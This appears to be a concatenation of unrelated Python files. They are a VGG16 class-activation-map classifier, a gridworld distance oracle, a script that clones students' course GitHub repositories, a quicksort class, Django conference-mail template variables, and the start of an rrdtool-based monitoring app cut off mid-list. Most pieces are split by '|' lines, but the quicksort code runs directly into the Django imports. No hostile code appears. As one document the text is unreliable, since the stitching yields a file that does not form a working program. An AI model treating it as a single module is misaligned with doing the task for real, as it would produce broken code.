# Module-wide configuration singletons shared by every ConvNet instance.
good_par = Or_Parameter(verbose=False)
cnn_param = CNN_Parameter(verbose=False)
class ConvNet():
    """VGG16-style classifier with Class Activation Mapping (CAM) support.

    Builds the VGG conv stack, a depthwise layer, global average pooling
    (GAP) and a linear classifier; get_binary() reuses the GAP weights
    to produce per-class activation maps at input resolution.
    """
    def p(self, t):
        # Debug helper: print a tensor's name and static shape.
        print(t.name, t.get_shape())
    def ld_vgg_wts(self):
        # Load pickled pretrained VGG weights (used when fine-tuning).
        with open(good_par.vgg_weights, "rb") as f:
            self.pretrained_weights = cPickle.load(f, fix_imports=True, errors="strict")
    def cnn_build(self, image):
        """Build the forward graph.

        Args:
            image: NHWC RGB tensor; assumed scaled to [0, 1] since it is
                multiplied by 255 before mean subtraction — TODO confirm.
        Returns:
            (last_cnn, space, P_cls): final conv feature map, its GAP
            vector, and the unnormalized class scores.
        """
        image = self.img_cnvrsn_scaling(image)
        conv1_1 = self.conv_dep(image, "conv1_1", nonlinearity=tf.nn.relu)
        conv1_2 = self.conv_dep(conv1_1, "conv1_2", nonlinearity=tf.nn.relu)
        pool1 = tf.nn.max_pool2d(conv1_2, ksize=cnn_param.pool_window,strides=cnn_param.pool_stride, padding='SAME', name='pool1')
        conv2_1 = self.conv_dep(pool1, "conv2_1", nonlinearity=tf.nn.relu)
        conv2_2 = self.conv_dep(conv2_1, "conv2_2", nonlinearity=tf.nn.relu)
        pool2 = tf.nn.max_pool2d(conv2_2, ksize=cnn_param.pool_window,strides=cnn_param.pool_stride, padding='SAME', name='pool2')
        conv3_1 = self.conv_dep(pool2, "conv3_1", nonlinearity=tf.nn.relu)
        conv3_2 = self.conv_dep(conv3_1, "conv3_2", nonlinearity=tf.nn.relu)
        conv3_3 = self.conv_dep(conv3_2, "conv3_3", nonlinearity=tf.nn.relu)
        pool3 = tf.nn.max_pool2d(conv3_3, ksize=cnn_param.pool_window,strides=cnn_param.pool_stride, padding='SAME', name='pool3')
        conv4_1 = self.conv_dep(pool3, "conv4_1", nonlinearity=tf.nn.relu)
        conv4_2 = self.conv_dep(conv4_1, "conv4_2", nonlinearity=tf.nn.relu)
        conv4_3 = self.conv_dep(conv4_2, "conv4_3", nonlinearity=tf.nn.relu)
        pool4 = tf.nn.max_pool2d(conv4_3, ksize=cnn_param.pool_window,strides=cnn_param.pool_stride, padding='SAME', name='pool4')
        conv5_1 = self.conv_dep(pool4, "conv5_1", nonlinearity=tf.nn.relu)
        conv5_2 = self.conv_dep(conv5_1, "conv5_2", nonlinearity=tf.nn.relu)
        conv5_3 = self.conv_dep(conv5_2, "conv5_3", nonlinearity=tf.nn.relu)
        # Extra head layers trained from scratch (see conv_dep's
        # fine_tuning exclusion list): conv6_1, depthwise "depth", conv6.
        conv_depth_1 = self.conv_dep(conv5_3, "conv6_1")
        conv_depth = self.conv_dep(conv_depth_1, "depth")
        last_cnn = self.conv_dep(conv_depth, "conv6")
        # Global average pool over the spatial dimensions.
        space = tf.reduce_mean(last_cnn, [1, 2])
        with tf.compat.v1.variable_scope("GAP"):
            space_w = tf.compat.v1.get_variable("W", shape=cnn_param.layer_shapes['GAP/W'],
                                      initializer=tf.random_normal_initializer(stddev=good_par.std_dev))
            P_cls = tf.matmul(space, space_w)
        return last_cnn, space, P_cls
    def get_binary(self, tf_cls, last_cnn):
        """Build the CAM for class index tf_cls from the final feature map."""
        with tf.compat.v1.variable_scope("GAP", reuse=True):
            # Column of the GAP classifier weights for the requested class.
            class_w = tf.gather(tf.transpose(tf.compat.v1.get_variable("W")), tf_cls)
            class_w = tf.reshape(class_w, [-1, cnn_param.last_features, 1])
        # Upsample features to input resolution, then project onto the
        # class weights to get a per-pixel activation map.
        last_cnn1 = tf.compat.v1.image.resize_bilinear(last_cnn, [good_par.image_h, good_par.image_w])
        last_cnn1 = tf.reshape(last_cnn1, [-1, good_par.image_h * good_par.image_w, cnn_param.last_features])
        binary_map = tf.reshape(tf.matmul(last_cnn1, class_w), [-1, good_par.image_h, good_par.image_w])
        return binary_map
    def get_vgg_wts(self, layer_name, bias=False):
        # Pretrained weights are stored (out, in, h, w); transpose kernels
        # to TF's (h, w, in, out) layout. bias=True returns the bias vector.
        layer = self.pretrained_weights[layer_name]
        if bias: return layer[1]
        return layer[0].transpose((2, 3, 1, 0))
    def conv_dep(self, input_, name, nonlinearity=None):
        """3x3 conv (or depthwise conv for the "depth" layer) + bias + dropout.

        When fine-tuning, all layers except the new head ('conv6',
        'conv6_1', 'depth') are initialized from pretrained VGG weights.
        """
        with tf.compat.v1.variable_scope(name) as scope:
            W_shape = cnn_param.layer_shapes[name + '/W']
            b_shape = cnn_param.layer_shapes[name + '/b']
            if good_par.fine_tuning and name not in ['conv6', 'conv6_1', 'depth']:
                W = self.get_vgg_wts(name)
                b = self.get_vgg_wts(name, bias=True)
                W_initializer = tf.constant_initializer(W)
                b_initializer = tf.constant_initializer(b)
            else:
                W_initializer = tf.truncated_normal_initializer(stddev=good_par.std_dev)
                b_initializer = tf.constant_initializer(0.0)
            conv_wts = tf.compat.v1.get_variable("W", shape=W_shape, initializer=W_initializer)
            conv_bias = tf.compat.v1.get_variable("b", shape=b_shape, initializer=b_initializer)
            if name == 'depth':
                conv = tf.compat.v1.nn.depthwise_conv2d_native(input_, conv_wts, [1, 1, 1, 1], padding='SAME')
            else:
                conv = tf.nn.conv2d(input_, conv_wts, [1, 1, 1, 1], padding='SAME')
            bias = tf.nn.bias_add(conv, conv_bias)
            # NOTE(review): dropout is applied unconditionally (also at
            # inference time) — confirm this is intended.
            bias = tf.nn.dropout(bias, 0.7)
            if nonlinearity is None:
                return bias
            return nonlinearity(bias, name=name)
    def img_cnvrsn_scaling(self, image):
        # Rescale to 0-255, convert RGB -> BGR and subtract the VGG
        # per-channel ImageNet means, matching the pretrained weights.
        image = image*255.
        r, g, b = tf.split(image, 3, 3)
        VGG_MEAN = [103.939, 116.779, 123.68]
        return tf.concat([b - VGG_MEAN[0], g - VGG_MEAN[1], r - VGG_MEAN[2]], 3)
|
import numpy as np
from visgrid.gridworld import skills
class DistanceOracle:
    """Answers grid-distance queries after warming the skills cache.

    Construction runs GoToGridPosition for every ordered pair of grid
    positions so later queries hit precomputed results.
    """
    def __init__(self, env):
        self.env = env
        all_positions = np.indices((env._rows, env._cols)).T.reshape(-1, 2)
        # Pre-compute all pairwise distances
        for start in all_positions:
            for goal in all_positions:
                skills.GoToGridPosition(env, start, goal)

    def pairwise_distances(self, indices, s0, s1):
        """Return path lengths between the selected (s0, s1) state pairs."""
        return [
            skills.GoToGridPosition(self.env, a, b)[1]
            for a, b in zip(s0[indices], s1[indices])
        ]
#%%
if __name__ == '__main__':
    # Demo: precompute all distances on a 6x6 spiral maze and plot a
    # histogram of the cached path lengths.
    import seeding
    import numpy as np
    import random
    from visgrid.gridworld import GridWorld, MazeWorld, SpiralWorld
    from visgrid.gridworld import grid
    import matplotlib.pyplot as plt
    # NOTE(review): no-op expression — looks like a leftover from an
    # interactive (#%%) session.
    grid.directions[3]
    seeding.seed(0, np, random)
    env = SpiralWorld(rows=6, cols=6)
    env.plot()
    oracle = DistanceOracle(env)
    # One distance per cached (start, goal) pair on the environment.
    distances = [v[-1] for k, v in env.saved_directions.items()]
    plt.hist(distances, bins=36)
    plt.show()
|
import os
# Individual student repositories to mirror locally.
STUDENT_REPOSITORIES = [
    "https://github.com/KurtDankovich/360-kurt-dankovich.git",
    "https://github.com/BryanGabe00/360-bryan-gabe",
    "https://github.com/RichGol/360-richard-goluszka",
    "https://github.com/mcclint50/360-colin-mcclintic.git",
    "https://github.com/JuanMoncada23/360-juan-moncada.git",
    "https://github.com/BrennanP01/360-brennan-price.git",
    "https://github.com/mrodriguezdelcorral/360-Maria-Rodriguez.git"
]
# Team repositories for sprint 3.
SPRINT_3_TEAM_REPOSITORIES = [
    "https://github.com/mcclint50/360-Mongooses.git",
    "https://github.com/BrennanP01/360-gloriousKenobis.git",
    "https://github.com/JuanMoncada23/360-RedDragons.git"
]
# Team repositories for sprint 4 (teams partially renamed/moved).
SPRINT_4_TEAM_REPOSITORIES = [
    "https://github.com/mcclint50/360-Mongooses.git",  # Mongooses (1)
    "https://github.com/BryanGabe00/QuizMaster.git",  # RedDragons
    "https://github.com/BrennanP01/360-gloriousKenobis.git"  # GloriousKenobis (3)
]
def printAndSystemExecute(executeString):
    """Echo a shell command and then run it with os.system."""
    print('Executing: ' + executeString)
    os.system(executeString)
def clone(repositoryLink):
    """git-clone the repository into the current working directory."""
    printAndSystemExecute('git clone ' + repositoryLink)
def update(directoryName):
    """Run `git pull` inside directoryName, then return to the parent dir."""
    os.chdir(directoryName)
    printAndSystemExecute("git pull")
    os.chdir("..")
def cloneOrUpdate(repositoryLink):
    """Clone repositoryLink if no local checkout exists, otherwise pull it.

    The local directory name is the last path component with a trailing
    ".git" removed, e.g.
    https://github.com/KurtDankovich/360-kurt-dankovich.git -> 360-kurt-dankovich
    """
    # Strip only a trailing ".git": the old split(".") truncated any
    # repository name that itself contained a dot.
    directoryName = repositoryLink.rsplit("/", 1)[-1]
    if directoryName.endswith(".git"):
        directoryName = directoryName[:-len(".git")]
    if os.path.isdir(directoryName):
        print("Update %s" % repositoryLink)
        update(directoryName)
    else:
        print("Clone %s" % repositoryLink)
        clone(repositoryLink)
    print("")
# Entry point: clear the terminal, then refresh every known repository,
# grouped by category.
os.system("clear")
print("Cloning or Updating Student Repositories:\n")
for repositoryLink in STUDENT_REPOSITORIES:
    cloneOrUpdate(repositoryLink)
print("Cloning or Updating Sprint 3 Team Repositories:\n")
for repositoryLink in SPRINT_3_TEAM_REPOSITORIES:
    cloneOrUpdate(repositoryLink)
print("Cloning or Updating Sprint 4 Team Repositories:\n")
for repositoryLink in SPRINT_4_TEAM_REPOSITORIES:
    cloneOrUpdate(repositoryLink)
|
"""
quick sort algorithm adapted from Wikipedia page
@author Axel Ancona Esselmann
"""
class QuickSort():
    """In-place quicksort using the Lomuto partition scheme.

    Adapted from the Wikipedia quicksort article.
    """

    def sort(self, A):
        """Sort list A in place in ascending order."""
        self._quicksort(A, 0, len(A) - 1)

    def _quicksort(self, A, lo, hi):
        # Recurse on the two halves around the pivot's final position.
        if lo < hi:
            p = self._partition(A, lo, hi)
            self._quicksort(A, lo, p - 1)
            self._quicksort(A, p + 1, hi)

    def _partition(self, A, lo, hi):
        # Lomuto partition: A[hi] is the pivot; i is the boundary of the
        # "<= pivot" region.
        pivot = A[hi]
        i = lo
        # range(), not the Python-2-only xrange(): the original raised
        # NameError under Python 3.
        for j in range(lo, hi):
            if A[j] <= pivot:
                A[i], A[j] = A[j], A[i]
                i += 1
        A[i], A[hi] = A[hi], A[i]
        return i
from django.conf import settings
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
from collections import namedtuple
from markdown import markdown
from chair_mail.utility import get_absolute_url, markdownify_link, \
markdownify_list
from review.models import Review
from submissions.models import Submission
# A template variable: its name and a human-readable description.
Var = namedtuple('Var', ('name', 'description'))
#
# FRAME CONTEXT (DO NOT USE IT IN GROUP MESSAGE RENDERING!!!)
#
# Variables available when rendering the outer letter "frame" (the
# HTML/plain-text wrapper around the message body).
FRAME_SUBJECT = Var('subject', _('subject defined when writing a new letter'))
FRAME_BODY = Var('body', _('body of the letter'))
FRAME_SITE_URL = Var('site_url', _('link to the registration system site'))
FRAME_CONF_EMAIL = Var('conf_email', _('email for contacting organizers'))
FRAME_CONF_SITE_URL = Var('conf_site_url', _('URL of the conference web site'))
FRAME_CONF_FULL_NAME = Var('conf_full_name', _('full name of the conference'))
FRAME_CONF_SHORT_NAME = Var('conf_short_name', _('short name of the conference'))
FRAME_CONF_LOGO_URL = Var(
    'conf_logo_url',
    _('URL of the conference logotype. Note, that it better should be located '
      'at some well-known source (like Google Drive or Amazon S3), since some '
      'email clients may cut images from suspicious sources.'))
# (name, description) pairs, e.g. for showing available variables to chairs.
FRAME_VARS = tuple((var.name, var.description) for var in (
    FRAME_SUBJECT, FRAME_BODY, FRAME_SITE_URL, FRAME_CONF_EMAIL,
    FRAME_CONF_SITE_URL, FRAME_CONF_FULL_NAME, FRAME_CONF_SHORT_NAME,
    FRAME_CONF_LOGO_URL
))
def get_frame_context(conference, subject, body):
    """Build frame context. It differs from GroupMessage rendering since
    frame is separately defined in HTML and plain-text: we don't need
    to enclose references in Markdown or HTML.
    """
    site_url = f'{settings.SITE_PROTOCOL}://{settings.SITE_DOMAIN}'
    logo_url = conference.logotype.url if conference.logotype else ''
    return {
        FRAME_SUBJECT.name: subject,
        FRAME_BODY.name: body,
        FRAME_SITE_URL.name: site_url,
        FRAME_CONF_EMAIL.name: conference.contact_email,
        FRAME_CONF_SITE_URL.name: conference.site_url,
        FRAME_CONF_FULL_NAME.name: conference.full_name,
        FRAME_CONF_SHORT_NAME.name: conference.short_name,
        FRAME_CONF_LOGO_URL.name: logo_url,
    }
#
# CONFERENCE CONTEXT
#
# Conference-level variables available in every group message.
CONF_SHORT_NAME = Var('conf_short_name', _('short name of the conference'))
CONF_FULL_NAME = Var('conf_full_name', _('full name of the conference'))
CONF_START_DATE = Var('conf_start_date', _('conference start date'))
CONF_END_DATE = Var('conf_end_date', _('conference end date'))
CONF_SITE_URL = Var('conf_site_url', _('conference site URL'))
CONF_EMAIL = Var('conf_email', _('email of the organizing committee'))
SUBMISSION_END_DATETIME = Var('sub_end_date', _('end of submission datetime'))
REVIEW_END_DATETIME = Var('rev_end_date', _('end of review datetime'))
CONFERENCE_VARS = tuple((var.name, var.description) for var in (
    CONF_SHORT_NAME, CONF_FULL_NAME, CONF_START_DATE, CONF_END_DATE,
    CONF_SITE_URL, CONF_EMAIL, SUBMISSION_END_DATETIME, REVIEW_END_DATETIME,
))
def get_conference_context(conference):
    """Conference-level template variables: names, dates and contact links."""
    context = {}
    context[CONF_SHORT_NAME.name] = conference.short_name
    context[CONF_FULL_NAME.name] = conference.full_name
    context[CONF_START_DATE.name] = conference.start_date
    context[CONF_END_DATE.name] = conference.close_date
    context[CONF_SITE_URL.name] = markdownify_link(conference.site_url)
    context[CONF_EMAIL.name] = markdownify_link(conference.contact_email, 'mailto:')
    context[SUBMISSION_END_DATETIME.name] = conference.submission_stage.end_date
    context[REVIEW_END_DATETIME.name] = conference.review_stage.end_date
    return context
#
# USER CONTEXT
#
# - user profile context:
#
# Per-user profile variables.
USERNAME = Var('username', _('user full name in English'))
FIRST_NAME = Var('first_name', _('user first name in English'))
LAST_NAME = Var('last_name', _('user last name in English'))
USER_ID = Var('user_id', _('user ID'))
USER_PROFILE_VARS = tuple((var.name, var.description) for var in (
    USERNAME, FIRST_NAME, LAST_NAME, USER_ID
))
def _get_user_profile_context(user):
    """Context entries describing the user's profile (name parts and ID)."""
    profile = user.profile
    context = {
        USERNAME.name: profile.get_full_name(),
        FIRST_NAME.name: profile.first_name,
        LAST_NAME.name: profile.last_name,
        USER_ID.name: user.pk,
    }
    return context
#
# - user submissions context:
#
# Variables describing the user's submissions, bucketed by completeness
# and review status; *_LIST variables render as markdown lists.
NUM_PAPERS = Var('num_papers', _('number of papers authored by the user'))
PAPERS_LIST = Var('papers_list', _('list of all papers authored by the user'))
NUM_SUBMITTED_PAPERS = Var(
    'num_submitted_papers',
    _('number of papers in "submitted" phase')
)
SUBMITTED_PAPERS_LIST = Var(
    'submitted_papers_list',
    _('list of all papers in "submitted" phase')
)
NUM_INCOMPLETE_SUBMITTED_PAPERS = Var(
    'num_incomplete_submitted_papers',
    _('number of partially filled papers in "submitted" phase')
)
INCOMPLETE_SUBMITTED_PAPERS_LIST = Var(
    'incomplete_submitted_papers_list',
    _('list of partially filled papers in "submitted" phase')
)
NUM_COMPLETE_SUBMITTED_PAPERS = Var(
    'num_complete_submitted_papers',
    _('number of completely filled papers in "submitted" phase')
)
COMPLETE_SUBMITTED_PAPERS_LIST = Var(
    'complete_submitted_papers_list',
    _('list of completely filled papers in "submitted" phase'))
NUM_EMPTY_PAPERS = Var(
    'num_empty_papers',
    _('number of papers without even title')
)
EMPTY_PAPERS_LIST = Var(
    'empty_papers_list',
    _('list of papers without even title')
)
NUM_UNDER_REVIEW_PAPERS = Var(
    'num_under_review_papers',
    _('number of papers authored by the user being under review')
)
UNDER_REVIEW_PAPERS_LIST = Var(
    'under_review_papers_list',
    _('list of papers authored by the user being under review')
)
USER_SUBMISSIONS_VARS = tuple((var.name, var.description) for var in (
    NUM_PAPERS, PAPERS_LIST, NUM_SUBMITTED_PAPERS, SUBMITTED_PAPERS_LIST,
    NUM_INCOMPLETE_SUBMITTED_PAPERS, INCOMPLETE_SUBMITTED_PAPERS_LIST,
    NUM_COMPLETE_SUBMITTED_PAPERS, COMPLETE_SUBMITTED_PAPERS_LIST,
    NUM_EMPTY_PAPERS, EMPTY_PAPERS_LIST,
    NUM_UNDER_REVIEW_PAPERS, UNDER_REVIEW_PAPERS_LIST,
))
def _get_user_submissions_context(user, conference):
    """Get context dictionary regarding user submissions.

    Builds counts and markdown lists of the user's papers for the given
    conference, bucketed into all / submitted / complete / incomplete /
    empty / under-review (keys are the *_PAPERS and *_LIST var names).
    """
    # TODO: add context for accepted and rejected papers
    papers = (Submission.objects
              .filter(conference=conference)
              .filter(authors__user=user))
    # A paper counts as "complete" when it has no validation warnings.
    complete_ids = [p.pk for p in papers if not p.warnings()]
    _submitted = papers.filter(status=Submission.SUBMITTED)
    under_review = papers.filter(status=Submission.UNDER_REVIEW)
    submitted = {
        'all': _submitted,
        'complete': _submitted.filter(pk__in=complete_ids),
        'incomplete': _submitted.exclude(pk__in=complete_ids),
        'empty': _submitted.filter(title='')
    }
    # Helper to build markdown representation of the queryset:
    def get_displayed_title(submission):
        title = submission.title
        if not title:
            return f'*no title*'
        return f'{title}'
    def ul(query, default_value=''):
        # NOTE(review): default_value is accepted but ignored — the call
        # below hard-codes 'no name'. Confirm whether that is intended.
        return markdownify_list(
            query,
            get_item_value=get_displayed_title,
            get_item_url=lambda sub: get_absolute_url(
                reverse('submissions:overview', kwargs={'pk': sub.pk})),
            default_value='no name',
        )
    return {
        NUM_PAPERS.name: papers.count(),
        PAPERS_LIST.name: ul(papers),
        NUM_SUBMITTED_PAPERS.name: submitted['all'].count(),
        SUBMITTED_PAPERS_LIST.name: ul(submitted['all']),
        NUM_COMPLETE_SUBMITTED_PAPERS.name: submitted['complete'].count(),
        COMPLETE_SUBMITTED_PAPERS_LIST.name:ul(submitted['complete']),
        NUM_INCOMPLETE_SUBMITTED_PAPERS.name: submitted['incomplete'].count(),
        INCOMPLETE_SUBMITTED_PAPERS_LIST.name: ul(submitted['incomplete']),
        NUM_EMPTY_PAPERS.name: submitted['empty'].count(),
        EMPTY_PAPERS_LIST.name: ul(submitted['empty']),
        NUM_UNDER_REVIEW_PAPERS.name: under_review.count(),
        UNDER_REVIEW_PAPERS_LIST.name: ul(under_review)
    }
#
# - user reviews context:
#
# Variables describing the reviews assigned to the user.
NUM_REVIEWS = Var('num_reviews', _('number of reviews assigned to this user'))
REVIEWS_LIST = Var('reviews_list', _('list of reviews assigned to this user'))
NUM_COMPLETE_REVIEWS = Var(
    'num_complete_reviews',
    _('number of completed reviews assigned to this user')
)
COMPLETE_REVIEWS_LIST = Var(
    'complete_reviews_list',
    _('list of completed reviews assigned to this user'),
)
NUM_INCOMPLETE_REVIEWS = Var(
    'num_incomplete_reviews',
    _('number of reviews to be finished'),
)
INCOMPLETE_REVIEWS_LIST = Var(
    'incomplete_reviews_list',
    _('list of reviews to be finished')
)
USER_REVIEWS_VARS = tuple((var.name, var.description) for var in (
    NUM_REVIEWS, REVIEWS_LIST, NUM_COMPLETE_REVIEWS, COMPLETE_REVIEWS_LIST,
    NUM_INCOMPLETE_REVIEWS, INCOMPLETE_REVIEWS_LIST
))
def _get_user_review_context(user, conference):
    """Get context dictionary regarding user reviews.

    Builds counts and markdown lists of the reviews assigned to the user
    for the given conference, split into complete vs. incomplete.
    """
    reviews = (Review.objects
               .filter(stage__submission__conference=conference)
               .filter(reviewer__user=user))
    # A review counts as "complete" when it has no validation warnings.
    complete_reviews_ids = [rev.pk for rev in reviews if not rev.warnings()]
    complete_reviews = reviews.filter(pk__in=complete_reviews_ids)
    incomplete_reviews = reviews.exclude(pk__in=complete_reviews_ids)
    # Helper to build <ul>-representation of the queryset:
    def ul(query):
        return markdownify_list(
            query,
            get_item_value=lambda rev: rev.paper.title,
            get_item_url=lambda rev: get_absolute_url(
                reverse('review:review-details', kwargs={'pk': rev.pk}))
        )
    return {
        NUM_REVIEWS.name: reviews.count(),
        REVIEWS_LIST.name: ul(reviews),
        NUM_COMPLETE_REVIEWS.name: complete_reviews.count(),
        COMPLETE_REVIEWS_LIST.name: ul(complete_reviews),
        NUM_INCOMPLETE_REVIEWS.name: incomplete_reviews.count(),
        INCOMPLETE_REVIEWS_LIST.name: ul(incomplete_reviews),
    }
#
# ---- BUILDING USER CONTEXT AND VARS ----
#
def get_user_context(user, conference):
    """Merge the profile, submissions and review contexts for one user."""
    context = {}
    context.update(_get_user_profile_context(user))
    context.update(_get_user_submissions_context(user, conference))
    context.update(_get_user_review_context(user, conference))
    return context
USER_VARS = USER_PROFILE_VARS + USER_SUBMISSIONS_VARS + USER_REVIEWS_VARS
#
# SUBMISSION CONTEXT
#
# Variables available when rendering a message about one submission.
SUB_ID = Var('paper_id', _('submission ID'))
SUB_TITLE = Var('paper_title', _('paper title'))
SUB_ABSTRACT = Var('paper_abstract', _('paper abstract'))
SUB_AUTHORS = Var('paper_authors', _('paper authors string'))
SUB_URL = Var('paper_url', _('URL of the paper'))
# TODO: add variables for review results
SUB_REVIEW_SCORE = Var('paper_review_score', _('Paper average score'))
SUB_REVIEWS_LIST = Var('paper_reviews_list', _('List of reviews with scores'))
SUB_REVIEW_DECISION = Var('paper_review_decision', _('Review decision'))
SUB_PROCEEDINGS_LIST = Var('paper_proceedings',
                           _('Proceedings for accepted papers'))
# Fix: SUB_REVIEW_DECISION was missing from this listing even though
# get_submission_context() supplies it, so the variable was undocumented.
SUBMISSION_VARS = tuple((var.name, var.description) for var in (
    SUB_ID, SUB_TITLE, SUB_ABSTRACT, SUB_AUTHORS, SUB_URL,
    SUB_REVIEW_SCORE, SUB_REVIEWS_LIST, SUB_REVIEW_DECISION,
    SUB_PROCEEDINGS_LIST,
))
def get_submission_context(submission):
    """Context entries for one submission: metadata, review summary and
    proceedings, keyed by the SUB_* variable names."""
    # Only the first review stage is summarized here.
    stage = submission.reviewstage_set.first()
    reviews = []
    decision_type = None
    if stage:
        reviews = list(stage.review_set.filter(submitted=True))
        decision_type = stage.decision.decision_type if stage.decision else None
    # One markdown paragraph per submitted review with its four scores.
    review_lines = []
    for n, r in enumerate(reviews):
        scores = [
            f'Technical merit: **{r.technical_merit}**',
            f'originality: **{r.originality}**',
            f'relevance: **{r.relevance}**',
            f'clarity: **{r.clarity}**'
        ]
        review_lines.append(
            f'**Review #{n + 1}**: {", ".join(scores)}\n\n'
            f'{r.details}')
    # Proceedings entries for each active camera-ready version.
    proceedings = []
    for camera in submission.cameraready_set.all():
        proc_type, volume = camera.proc_type, camera.volume
        if camera.active and proc_type:
            vol_str = f', {volume.name}' if volume else ''
            proceedings.append(f'{proc_type.name}{vol_str}')
    return {
        SUB_ID.name: submission.pk,
        SUB_TITLE.name: submission.title,
        SUB_ABSTRACT.name: submission.abstract,
        SUB_AUTHORS.name: submission.get_authors_display(),
        SUB_URL.name: markdownify_link(get_absolute_url(
            reverse('submissions:overview', kwargs={'pk': submission.pk}))),
        SUB_REVIEW_SCORE.name:
            '-' if not stage or not stage.score else stage.score,
        SUB_REVIEWS_LIST.name: '\n\n'.join(review_lines),
        SUB_REVIEW_DECISION.name:
            decision_type.description if decision_type else '',
        # NOTE(review): '\n-' leaves the first item without a '-' marker —
        # confirm whether '\n- ' (with a leading dash per item) was meant.
        SUB_PROCEEDINGS_LIST.name: '\n-'.join(proceedings)
    }
|
from xml.etree import ElementTree
from time import time
from glob import glob
#import multiprocessing
import eventlet.green.subprocess as subprocess
import socket
import os.path
import sys
import os
import simplejson as json
import logging
import clustohttp
import eventlet
import memcache
import bottle
import jinja2
redis = eventlet.import_patched('redis')
# Install locations of the packaged static assets and Jinja2 templates.
STATIC_PATH = '/usr/share/metartg/static'
TEMPLATE_PATH = '/usr/share/metartg/templates'
# Module-level singletons shared by all request handlers: the bottle
# WSGI app, template environment, memcache client, greenthread pool,
# clusto inventory proxy and the redis connection.
bottle.debug(True)
application = bottle.default_app()
env = jinja2.Environment(loader=jinja2.FileSystemLoader(TEMPLATE_PATH))
cache = memcache.Client(['127.0.0.1:11211'])
gpool = eventlet.GreenPool(200)
clusto = clustohttp.ClustoProxy('http://clusto.simplegeo.com/api')
#rrdqueue = eventlet.Queue()
db = redis.Redis()
class RedisQueue(object):
    """Minimal FIFO queue backed by a Redis list.

    Items are JSON-serialized; put() pushes onto the left end and get()
    blocks until it can pop from the right end.
    """
    def __init__(self, key):
        self.key = key

    def put(self, obj):
        db.lpush(self.key, json.dumps(obj))

    def get(self):
        _, payload = db.brpop(self.key)
        return json.loads(payload)

    def qsize(self):
        return db.llen(self.key)
# Work queue of metric updates awaiting an RRD write.
rrdqueue = RedisQueue('rrdqueue')
# On-disk layout of RRD files, relative to the RRD root directory.
RRDPATH = '%(host)s/%(service)s/%(metric)s.rrd'
# rrdtool graph directive templates, keyed by graph type.  Each string is a
# DEF/CDEF/AREA/LINE argument eventually passed to `rrdtool graph`; the
# %(rrdpath)s placeholder is filled with the host's RRD directory at render
# time.  '\\l' is rrdtool's left-align legend marker (a literal backslash-l
# in the final command line).
RRD_GRAPH_DEFS = {
    # Memory counters come from the collector in KiB, hence the *1024 CDEFs.
    'system-memory': [
        'DEF:free=%(rrdpath)s/memory/free_memory.rrd:sum:AVERAGE',
        'DEF:total=%(rrdpath)s/memory/total_memory.rrd:sum:AVERAGE',
        'DEF:buffers=%(rrdpath)s/memory/buffer_memory.rrd:sum:AVERAGE',
        'DEF:active=%(rrdpath)s/memory/active_memory.rrd:sum:AVERAGE',
        'DEF:inactive=%(rrdpath)s/memory/inactive_memory.rrd:sum:AVERAGE',
        'CDEF:bytes_free=free,1024,*',
        'CDEF:bytes_total=total,1024,*',
        'CDEF:bytes_buffers=buffers,1024,*',
        'CDEF:bytes_active=active,1024,*',
        'CDEF:bytes_inactive=inactive,1024,*',
        'AREA:bytes_active#FF0000:Active memory\\l:STACK',
        'AREA:bytes_buffers#FFFC38:Buffer memory\\l:STACK',
        'AREA:bytes_inactive#700000:Inactive memory\\l:STACK',
        'LINE:bytes_total#FFFFFF:Total memory\\l',
    ],
    # NOTE(review): network graphs are hard-coded to eth0.
    'network-bytes': [
        'DEF:rx_bytes=%(rrdpath)s/network/eth0_rx_bytes.rrd:sum:AVERAGE',
        'DEF:tx_bytes=%(rrdpath)s/network/eth0_tx_bytes.rrd:sum:AVERAGE',
        'LINE:rx_bytes#006699:rx bytes\\l',
        'LINE:tx_bytes#996600:tx bytes\\l',
    ],
    'network-packets': [
        'DEF:rx_packets=%(rrdpath)s/network/eth0_rx_packets.rrd:sum:AVERAGE',
        'DEF:tx_packets=%(rrdpath)s/network/eth0_tx_packets.rrd:sum:AVERAGE',
        'LINE:rx_packets#006699:rx packets\\l',
        'LINE:tx_packets#996600:tx packets\\l',
    ],
    'system-cpu': [
        'DEF:cpu_user=%(rrdpath)s/cpu/user.rrd:sum:AVERAGE',
        'DEF:cpu_system=%(rrdpath)s/cpu/sys.rrd:sum:AVERAGE',
        'DEF:cpu_nice=%(rrdpath)s/cpu/nice.rrd:sum:AVERAGE',
        'DEF:cpu_iowait=%(rrdpath)s/cpu/iowait.rrd:sum:AVERAGE',
        'DEF:cpu_steal=%(rrdpath)s/cpu/steal.rrd:sum:AVERAGE',
        'AREA:cpu_system#FF6600:CPU system\\l:STACK',
        'AREA:cpu_nice#FFCC00:CPU nice\\l:STACK',
        'AREA:cpu_user#FFFF66:CPU user\\l:STACK',
        'AREA:cpu_iowait#FF5555:CPU iowait\\l:STACK',
        'AREA:cpu_steal#EA8F00FF:CPU steal\\l:STACK',
    ],
    # sar-io: iowait is DEF'd twice so it can be drawn once as a filled area
    # and once as a darker outline (iowait_x).  bread/bwrit are 512-byte
    # sectors, converted to MB by the CDEFs (512 * sectors / 1048576).
    'sar-io': [
        'DEF:iowait=%(rrdpath)s/sar-cpu/iowait.rrd:sum:AVERAGE',
        'DEF:iowait_x=%(rrdpath)s/sar-cpu/iowait.rrd:sum:AVERAGE',
        'DEF:bread_s=%(rrdpath)s/sar-io/bytes_read_sec.rrd:sum:AVERAGE',
        'CDEF:cdef_bread_s=bread_s,512,*,1048576,/',
        'DEF:bwrit_s=%(rrdpath)s/sar-io/bytes_written_sec.rrd:sum:AVERAGE',
        'CDEF:cdef_bwrit_s=bwrit_s,512,*,1048576,/',
        'DEF:pswpin_s=%(rrdpath)s/sar-swapping/pages_swapped_in_sec.rrd:sum:AVERAGE',
        'DEF:pswpout_s=%(rrdpath)s/sar-swapping/pages_swapped_out_sec.rrd:sum:AVERAGE',
        'AREA:iowait#D8ACE0FF:CPU i/o wait\\l',
        'LINE1:iowait_x#623465FF:',
        'LINE1:cdef_bread_s#EA8F00FF:MB read/s\\l',
        'LINE1:cdef_bwrit_s#157419FF:MB written/s\\l',
        'LINE1:pswpin_s#4444FFFF:Swap in/s\\l',
        'LINE1:pswpout_s#7EE600FF:Swap out/s\\l',
    ],
    'sar-load': [
        'DEF:ldavg1=%(rrdpath)s/sar-load/load_avg_1m.rrd:sum:AVERAGE',
        'DEF:ldavg5=%(rrdpath)s/sar-load/load_avg_5m.rrd:sum:AVERAGE',
